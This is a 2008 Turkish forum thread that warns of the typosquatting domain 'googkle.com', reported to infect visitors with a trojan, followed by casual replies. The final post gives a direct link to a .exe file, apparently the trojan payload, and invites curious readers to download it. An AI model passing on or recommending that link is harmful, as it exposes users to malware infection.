Şimdi Ara

Googkle.com tehdidine dikkat

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
17
Cevap
0
Favori
647
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: 1
Giriş
    Fazladan yazılan bir "k" harfi bakın nelere mal oluyor..

21.04.2008 22:46
    Arama yapmak için sık sık ziyaret ettiğimiz Google'ın adresini yanlış yazmak, tüm verilerinizi riske atıyor.

Dünyanın en çok tıklanan siteleri arasında yer alan Google'ın adresini yanlış yazmak başınızı ağrıtabilir. F-Prot ve F-Secure güvenlik firmaları tarafından yayınlanan duyuruda, "Googkle.com" adresi kullanıcılar için ciddi bir tehdit oluşturuyor. k ve l harflerinin yan yana olmasından dolayı kullanıcılar kolaylıkla "googkle" yazabiliyor ve bunun sonucunda da sistemlerine tehlikeli bir truva atı bulaşıyor.

Güvenlik firmaları, kullanıcıları kesinlikle "googkle.com" sitesine girmemelerini konusunda uyarıyor.

CHİP

• quote:

Orjinalden alıntı: marcopolo

Arama yapmak için sık sık ziyaret ettiğimiz Google'ın adresini yanlış yazmak, tüm verilerinizi riske atıyor.

Dünyanın en çok tıklanan siteleri arasında yer alan Google'ın adresini yanlış yazmak başınızı ağrıtabilir. F-Prot ve F-Secure güvenlik firmaları tarafından yayınlanan duyuruda, "Googkle.com" adresi kullanıcılar için ciddi bir tehdit oluşturuyor. k ve l harflerinin yan yana olmasından dolayı kullanıcılar kolaylıkla "googkle" yazabiliyor ve bunun sonucunda da sistemlerine tehlikeli bir truva atı bulaşıyor.

Güvenlik firmaları, kullanıcıları kesinlikle "googkle.com" sitesine girmemelerini konusunda uyarıyor.

CHİP

Emeğin için sağol +rep
    Ama daha önce verilmiş
    http://forum.donanimhaber.com/m_22726340/tm.htm

• benden hizlilarida varmis demekki. Neyse görmeyenler vardir belki......
  • girdim bişi yok
  • Sayfa bulunamiyor.
  • millet kesin merak edip girmişlerdir
  • YİĞİTİ BANLAMIŞLAR

........Y!g!T
  • Yapay Zeka’dan İlgili Konular
    Daha Fazla Göster
  • yigit naptı acaba merak ettim
  • quote:

Orjinalden alıntı: stonegiant

yigit naptı acaba merak ettim

Ban Nedeni: Uyari Puani Ust Limiti ingilizce küfür var, bilerek şarkıyı değiştirerek yazmış.
  • sanfa bulunamiii
  • uyardığının için teşekkürler.
  • quote:

Orjinalden alıntı: THE_SİMPSONS

sanfa bulunamiii

• quote:

Orjinalden alıntı: stonegiant

yigit naptı acaba merak ettim

3 gün burda 4 gün içerde
  • quote:

Orjinalden alıntı: Lo@ding

YİĞİTİ BANLAMIŞLAR

........Y!g!T

• quote:

Orjinalden alıntı: marcopolo

CHİP

Bi gireyim bakayım yav ne varmış.

• girdim daha doğrusu giremedim sayfa görüntülenemiyor diyor
  • İnsanın başına meraktan geliyormuş. Site yayında olsaydı hepinize güzel bir trojan süprizi olacaktı.

İsteyen alttaki siteye girsin. benden demesi sorumluluk kabul etmem.

http://www.1a123.com/hp/zz.exe 

< Bu mesaj bu kişi tarafından değiştirildi Cem -- 23 Nisan 2008; 4:24:55 >
  • 
Sayfa: 1
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.